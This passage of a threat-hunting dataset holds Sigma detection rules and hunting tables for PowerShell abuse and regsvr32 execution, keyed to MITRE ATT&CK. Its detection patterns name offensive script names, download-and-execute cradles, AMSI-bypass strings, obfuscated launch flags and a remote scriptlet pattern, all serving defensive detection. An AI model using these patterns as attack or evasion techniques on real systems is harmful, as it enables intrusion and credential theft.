"*\\Out-Minidump.ps1", + "*\\VolumeShadowCopyTools.ps1", + "*\\Invoke-ReflectivePEInjection.ps1", + "*\\Get-TimedScreenshot.ps1", + "*\\Invoke-UserHunter.ps1", + "*\\Find-GPOLocation.ps1", + "*\\Invoke-ACLScanner.ps1", + "*\\Invoke-DowngradeAccount.ps1", + "*\\Get-ServiceUnquoted.ps1", + "*\\Get-ServiceFilePermission.ps1", + "*\\Get-ServicePermission.ps1", + 
"*\\Invoke-ServiceAbuse.ps1", + "*\\Install-ServiceBinary.ps1", + "*\\Get-RegAutoLogon.ps1", + "*\\Get-VulnAutoRun.ps1", + "*\\Get-VulnSchTask.ps1", + "*\\Get-UnattendedInstallFile.ps1", + "*\\Get-WebConfig.ps1", + "*\\Get-ApplicationHost.ps1", + "*\\Get-RegAlwaysInstallElevated.ps1", + "*\\Get-Unconstrained.ps1", + "*\\Add-RegBackdoor.ps1", + "*\\Add-ScrnSaveBackdoor.ps1", + "*\\Gupt-Backdoor.ps1", + "*\\Invoke-ADSBackdoor.ps1", + "*\\Enabled-DuplicateToken.ps1", + "*\\Invoke-PsUaCme.ps1", + "*\\Remove-Update.ps1", + "*\\Check-VM.ps1", + "*\\Get-LSASecret.ps1", + "*\\Get-PassHashes.ps1", + "*\\Show-TargetScreen.ps1", + "*\\Port-Scan.ps1", + "*\\Invoke-PoshRatHttp.ps1", + "*\\Invoke-PowerShellTCP.ps1", + "*\\Invoke-PowerShellWMI.ps1", + "*\\Add-Exfiltration.ps1", + "*\\Add-Persistence.ps1", + "*\\Do-Exfiltration.ps1", + "*\\Start-CaptureServer.ps1", + "*\\Invoke-ShellCode.ps1", + "*\\Get-ChromeDump.ps1", + "*\\Get-ClipboardContents.ps1", + "*\\Get-FoxDump.ps1", + "*\\Get-IndexedItem.ps1", + "*\\Get-Screenshot.ps1", + "*\\Invoke-Inveigh.ps1", + "*\\Invoke-NetRipper.ps1", + "*\\Invoke-EgressCheck.ps1", + "*\\Invoke-PostExfil.ps1", + "*\\Invoke-PSInject.ps1", + "*\\Invoke-RunAs.ps1", + "*\\MailRaider.ps1", + "*\\New-HoneyHash.ps1", + "*\\Set-MacAttribute.ps1", + "*\\Invoke-DCSync.ps1", + "*\\Invoke-PowerDump.ps1", + "*\\Exploit-Jboss.ps1", + "*\\Invoke-ThunderStruck.ps1", + "*\\Invoke-VoiceTroll.ps1", + "*\\Set-Wallpaper.ps1", + "*\\Invoke-InveighRelay.ps1", + "*\\Invoke-PsExec.ps1", + "*\\Invoke-SSHCommand.ps1", + "*\\Get-SecurityPackages.ps1", + "*\\Install-SSP.ps1", + "*\\Invoke-BackdoorLNK.ps1", + "*\\PowerBreach.ps1", + "*\\Get-SiteListPassword.ps1", + "*\\Get-System.ps1", + "*\\Invoke-BypassUAC.ps1", + "*\\Invoke-Tater.ps1", + "*\\Invoke-WScriptBypassUAC.ps1", + "*\\PowerUp.ps1", + "*\\PowerView.ps1", + "*\\Get-RickAstley.ps1", + "*\\Find-Fruit.ps1", + "*\\HTTP-Login.ps1", + "*\\Find-TrustedDocuments.ps1", + "*\\Invoke-Paranoia.ps1", + "*\\Invoke-WinEnum.ps1", + 
"*\\Invoke-ARPScan.ps1", + "*\\Invoke-PortScan.ps1", + "*\\Invoke-ReverseDNSLookup.ps1", + "*\\Invoke-SMBScanner.ps1", + "*\\Invoke-Mimikittenz.ps1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration Tests" + ], + "level": "high" + }, + { + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth", + "references": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\powershell.exe", + "Initiated": "true" + }, + "filter": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.0.0.1" + ], + "DestinationIsIpv6": "false", + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrative scripts" + ], + "level": "low" + }, + { + "title": "PowerShell Rundll32 Remote Thread Creation", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "author": "Florian Roth", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html" + ], + "date": "2018/06/25", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "SourceImage": "*\\powershell.exe", + "TargetImage": 
"*\\rundll32.exe" + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085", + "attack.t1086" + ], + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "status": "experimental", + "description": "Detects suspicious scripting in WMI Event Consumers", + "author": "Florian Roth", + "references": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19" + ], + "date": "2019/04/15", + "tags": [ + "attack.t1086", + "attack.execution" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 20, + "Destination": [ + "*new-object system.net.webclient).downloadstring(*", + "*new-object system.net.webclient).downloadfile(*", + "*new-object net.webclient).downloadstring(*", + "*new-object net.webclient).downloadfile(*", + "* iex(*", + "*WScript.shell*", + "* -nop *", + "* -noprofile *", + "* -decode *", + "* -enc *" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative scripts" + ], + "level": "high" + }, + { + "title": "Powershell AMSI Bypass via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "experimental", + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "references": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1086" + ], + "author": "Markus Neis", + "date": "2018/08/17", + "logsource": { + "category": "process_creation", 
+ "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*System.Management.Automation.AmsiUtils*" + ] + }, + "selection2": { + "CommandLine": [ + "*amsiInitFailed*" + ] + }, + "condition": "selection1 and selection2", + "falsepositives": [ + "Potential Admin Activity" + ] + }, + "level": "high" + }, + { + "title": "Detection of PowerShell Execution via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "experimental", + "description": "Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll", + "references": [ + "https://github.com/p3nt4/PowerShdll/blob/master/README.md" + ], + "tags": [ + "attack.execution", + "attack.t1086", + "car.2014-04-003" + ], + "author": "Markus Neis", + "date": "2018/08/25", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": [ + "*\\rundll32.exe" + ] + }, + "selection2": { + "Description": [ + "*Windows-Hostprozess (Rundll32)*" + ] + }, + "selection3": { + "CommandLine": [ + "*Default.GetString*", + "*FromBase64String*" + ] + }, + "condition": "(selection1 or selection2) and selection3" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "PowerShell Download from URL", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "status": "experimental", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth", + "tags": [ + "attack.t1086", + "attack.execution" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\powershell.exe", + "CommandLine": [ + "*new-object system.net.webclient).downloadstring(*", + "*new-object system.net.webclient).downloadfile(*", + "*new-object net.webclient).downloadstring(*", + "*new-object net.webclient).downloadfile(*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + 
"ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "references": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\Powershell.exe" + ], + "CommandLine": [ + " -windowstyle h ", + " -windowstyl h", + " -windowsty h", + " -windowst h", + " -windows h", + " -windo h", + " -wind h", + " -win h", + " -wi h", + " -win h ", + " -win hi ", + " -win hid ", + " -win hidd ", + " -win hidde ", + " -NoPr ", + " -NoPro ", + " -NoProf ", + " -NoProfi ", + " -NoProfil ", + " -nonin ", + " -nonint ", + " -noninte ", + " -noninter ", + " -nonintera ", + " -noninterac ", + " -noninteract ", + " -noninteracti ", + " -noninteractiv ", + " -ec ", + " -encodedComman ", + " -encodedComma ", + " -encodedComm ", + " -encodedCom ", + " -encodedCo ", + " -encodedC ", + " -encoded ", + " -encode ", + " -encod ", + " -enco ", + " -en " + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious XOR Encoded PowerShell Command Line", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "description": "Detects suspicious powershell process which includes bxor command, alternatvide obfuscation method to b64 encoded commands.", + "status": "experimental", + "author": "Sami Ruohonen", + "date": "2018/09/05", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "detection": { + "selection": { + "CommandLine": [ + 
"* -bxor*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + } + }, + { + "title": "Default PowerSploit and Empire Schtasks Persistence", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "experimental", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "references": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/elevated/schtasks.py" + ], + "author": "Markus Neis, @Karneades", + "date": "2018/03/06", + "logsource": { + "product": "windows", + "category": "process_creation" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\powershell.exe" + ], + "CommandLine": [ + "*schtasks*/Create*/SC *ONLOGON*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *DAILY*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *ONIDLE*/TN *Updater*/TR *powershell*", + "*schtasks*/Create*/SC *Updater*/TN *Updater*/TR *powershell*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053", + "attack.t1086", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001" + ], + "falsepositives": [ + "False positives are possible, depends on organisation and processes" + ], + "level": "high" + }, + { + "title": "Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "description": "Detects suspicious powershell command line parameters used in Empire", + "status": "experimental", + "references": [ + 
"https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64" + ], + "author": "Florian Roth", + "date": "2019/04/20", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -NoP -sta -NonI -W Hidden -Enc *", + "* -noP -sta -w 1 -enc *", + "* -NoP -NonI -W Hidden -enc *" + ] + }, + "condition": "selection" + }, + "level": "critical" + }, + { + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "description": "Detects suspicious powershell process starts with base64 encoded commands", + "status": "experimental", + "references": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e" + ], + "author": "Florian Roth, Markus Neis", + "date": "2018/09/03", + "modified": "2019/07/30", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -e JAB*", + "* -enc JAB*", + "* -enco JAB*", + "* -encodedcommand JAB*", + "* BA^J e-", + "* -e SUVYI*", + "* -e aWV4I*", + "* -e SQBFAFgA*", + "* -e aQBlAHgA*", + "* -enc SUVYI*", + "* -enc aWV4I*", + "* -enc SQBFAFgA*", + "* -enc aQBlAHgA*" + ] + }, + "falsepositive1": { + "CommandLine": "* -ExecutionPolicy remotesigned *" + 
}, + "condition": "selection and not falsepositive1" + }, + "level": "high" + }, + { + "title": "Malicious Base64 encoded PowerShell Keywords in command lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "experimental", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "references": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "John Lambert (rule)", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "encoded": { + "Image": "*\\powershell.exe", + "CommandLine": "* hidden *" + }, + "selection": { + "CommandLine": [ + "*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA*", + "*aXRzYWRtaW4gL3RyYW5zZmVy*", + "*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA*", + "*JpdHNhZG1pbiAvdHJhbnNmZX*", + "*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg*", + "*Yml0c2FkbWluIC90cmFuc2Zlc*", + "*AGMAaAB1AG4AawBfAHMAaQB6AGUA*", + "*JABjAGgAdQBuAGsAXwBzAGkAegBlA*", + "*JGNodW5rX3Npem*", + "*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ*", + "*RjaHVua19zaXpl*", + "*Y2h1bmtfc2l6Z*", + "*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A*", + "*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg*", + "*lPLkNvbXByZXNzaW9u*", + "*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA*", + "*SU8uQ29tcHJlc3Npb2*", + "*Ty5Db21wcmVzc2lvb*", + "*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ*", + "*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA*", + "*lPLk1lbW9yeVN0cmVhb*", + "*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A*", + "*SU8uTWVtb3J5U3RyZWFt*", + "*Ty5NZW1vcnlTdHJlYW*", + "*4ARwBlAHQAQwBoAHUAbgBrA*", + "*5HZXRDaHVua*", + "*AEcAZQB0AEMAaAB1AG4Aaw*", + "*LgBHAGUAdABDAGgAdQBuAGsA*", + "*LkdldENodW5r*", + "*R2V0Q2h1bm*", + "*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A*", + "*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA*", + "*RIUkVBRF9JTkZPNj*", + "*SFJFQURfSU5GTzY0*", + "*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA*", + "*VEhSRUFEX0lORk82N*", + 
"*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA*", + "*cmVhdGVSZW1vdGVUaHJlYW*", + "*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA*", + "*NyZWF0ZVJlbW90ZVRocmVhZ*", + "*Q3JlYXRlUmVtb3RlVGhyZWFk*", + "*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA*", + "*0AZQBtAG0AbwB2AGUA*", + "*1lbW1vdm*", + "*AGUAbQBtAG8AdgBlA*", + "*bQBlAG0AbQBvAHYAZQ*", + "*bWVtbW92Z*", + "*ZW1tb3Zl*" + ] + }, + "condition": "encoded and selection" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Invocation based on Parent Process", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "status": "experimental", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth", + "references": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "Image": [ + "*\\powershell.exe" + ] + }, + "falsepositive": { + "CurrentDirectory": "*\\Health Service State\\\\*" + }, + "condition": "selection and not falsepositive" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "level": "medium" + }, + { + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "references": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth", + "date": 
"2019/01/09", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* /c powershell*\\AppData\\Local\\\\*", + "* /c powershell*\\AppData\\Roaming\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Administrative scripts" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + 
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + 
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://securelist.com/muddywater/88059/", + "https://github.com/PowerShellEmpire/Empire" + ] + }, + { + "technique_id": "T1117", + "command_list": [ + "excel.exe", + "regsvr32.exe", + "mshta.exe", + "odbcconf.exe", + "powerpoint.exe", + "reg32svr.exe", + "regsvr32.exe /i (http:|ftp:)", + "scrobj.dll", + "winword.exe", + "\\\\Windows\\\\.+\\\\regsvr32.exe/s|/i" + ], + "commands": [ + { + "command": "excel.exe", + "source": 
"Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "regsvr32.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "odbcconf.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "reg32svr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "regsvr32.exe /i (http:|ftp:)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "scrobj.dll", + "source": "Threat Hunting Tables", + "name": "loaded_dll" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\\\Windows\\\\.+\\\\regsvr32.exe/s|/i", + "source": "SysmonHunter - Regsvr32", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100032", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100046", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100055", + "os": "windows", + "parent_process": "odbcconf.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", 
+ "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "ccb1fa5cdbc402b912b01a1838c1f13e95e9392b3ab6cc5f28277c012b0759f9" + }, + { + "chain_id": "100063", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100069", + "os": "windows", + "parent_process": "reg32svr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100070", + "os": "windows", + "parent_process": "regsvr32.exe", + "commandline_string": "/i (http:|ftp:)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "scrobj.dll", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "reg32svr", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "chain_id": "100095", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "regsvr32.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "regsvr32", + "mitre_attack": "T1117", + "itw_sample": "" + }, + { + "name": "Regsvr32", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\regsvr32.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "/s|/i", + "op": 
"and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"regsvr32.exe\"or process_path contains \"rundll32.exe\"or process_path contains \"certutil.exe\")or process_command_line contains \"scrobj.dll\"", + "name": "Bypassing Application Whitelisting With Regsvr32" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_parent_path contains \"\\\\regsvr32.exe\"or process_path contains \"\\\\regsvr32.exe\")", + "name": "Regsvr32 Network" + } + ], + "possible_detections": [ + { + "title": "BlueMashroom DLL Load", + "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "status": "experimental", + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "references": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1117" + ], + "author": "Florian Roth", + "date": "2019/10/02", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\regsvr32*\\AppData\\Local\\\\*", + "*\\AppData\\Local\\\\*,DllEntry*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + 